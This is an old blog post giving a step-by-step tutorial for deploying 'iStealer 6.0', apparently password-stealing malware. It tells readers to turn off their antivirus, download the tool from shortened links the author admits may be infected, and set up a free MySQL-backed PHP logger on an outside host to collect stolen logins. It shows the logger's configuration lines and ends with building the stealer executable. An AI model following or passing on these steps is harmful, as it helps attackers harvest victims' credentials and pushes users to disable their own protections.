Sunday, August 8, 2010

iStealer 6.0 Tutorial

Firstly, you will need to download iStealer 6.0. You can download iStealer 6.0 from the link below or if you do not trust download from wherever you want

Turn of your webguard or av before download because istealer is a hacking tool so your antivirus will block it.
Ive put some links but im not sure if they are infected or not working. I wont be responsible for the problems from downloads try any one of these
http://is.gd/e8DZN  http://is.gd/e8EDU  http://is.gd/e8EET

Register at  http://Justfree.com
Once registered, make sure you verify your email. If you do not receive the email instantly check Junk/Spam, or wait a few minutes
Now, login using your username you registered with and password you registered with.

Once, you have logged in, click Create/delete MySQL database Now fill out the information as below:

Database Name: username_db
Simply create database your username will already be there,write any thing in the box then press Create Database.
You should get "The requested operation has been completed successfully. " and then get redirected back to the database page.

Username: username_user
Then press Create user, fill the box with anything you like and enter password for the user and click create user. You should get "The requested operation has been completed successfully. " and then get redirected back to the database page.

Now assign priviledges, Make sure that all the boxes are ticked after that click on assign priviledges.

Now open up index.php in the PHP Logger folder which is in the iStealer 6.0 download. Copy and paste the Datebase info you got above like shown in the picture:

Fill out your index.php like below:


$dbHost = "localhost"; // REMAINS LOCALHOST FOR EVERYONE
$dbUser = "username_db"; // (3)MySQL username
$dbPass = "Your password you filled in for user"; // (4)MySQL password
$dbDatabase = "username_db"; // (2)MySQL database name

$username = "username to login page"; // Login Username
$password = "password to login page"; // Login Password

$logspage = 100; // Number of logs per page

$dbHost will ALWAYS remain localhost.
$dbUser will be the username you signed up with and db (or whatever you named your database), so for example username_db
$dbPass is the password you used.
Use the image below if you are confused:



For:

$username = "create username to login page"; // Login Username
$password = "create password to login page"; // Login Password

Simply fill them in as the login you want for the actual iStealer login page.

Once you have filled in YOUR database information in the setup, save the index.php file.


Now press File Manager at the top.
In file manager if you will find a index.php or index html file delete it

Once there press Upload and upload the index.php and style.css files.
Then click on index.php and Note the url .This address is important.

Now open the istealer which you downloaded.
In the url box type the address of the index.php file . If you dont know that address then click on index.php file you just uploaded in the file manager.It should be in this form http://account name.justfree.com/

open the login page [ http://account name.jµstfree.com/] Log in with the username and password you put on these lines in the index.php:



$username = "username to login page"; // Login Username
$password = "password to login page"; // Login Password


Now press Test Url, if it comes up with "Works perfect!", then press Build and select where you want to save your built iStealer server.

No comments:

Post a Comment